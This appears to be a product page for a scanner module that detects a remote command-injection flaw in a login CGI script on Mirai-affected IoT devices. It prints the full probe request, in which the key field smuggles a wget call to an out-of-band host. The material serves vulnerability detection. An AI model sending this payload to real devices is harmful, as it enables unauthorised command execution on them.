Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Mirai - Remote Command Injection" module is designed to detect a critical vulnerability in the Mirai software. Mirai is a malware that targets Internet of Things (IoT) devices and turns them into a botnet. This module specifically targets the login CGI script in Mirai, where a key parameter is not properly sanitized, leading to a command injection vulnerability. The severity of this vulnerability is classified as critical.
This module was authored by gy741.
If exploited, this vulnerability allows an attacker to execute arbitrary commands on the affected device. This can lead to unauthorized access, data theft, and potential disruption of services.
The "Mirai - Remote Command Injection" module works by sending a crafted HTTP request to the target device's login CGI script. The request includes a payload that exploits the command injection vulnerability. Here is an example of the HTTP request:
POST /cgi-bin/login.cgi HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded
key=';`wget http://<InteractionURL>`;#
The module also includes matching conditions to determine if the target device is vulnerable. In this case, it checks if the interaction protocol is HTTP.
If the module detects a match, it will report the vulnerability.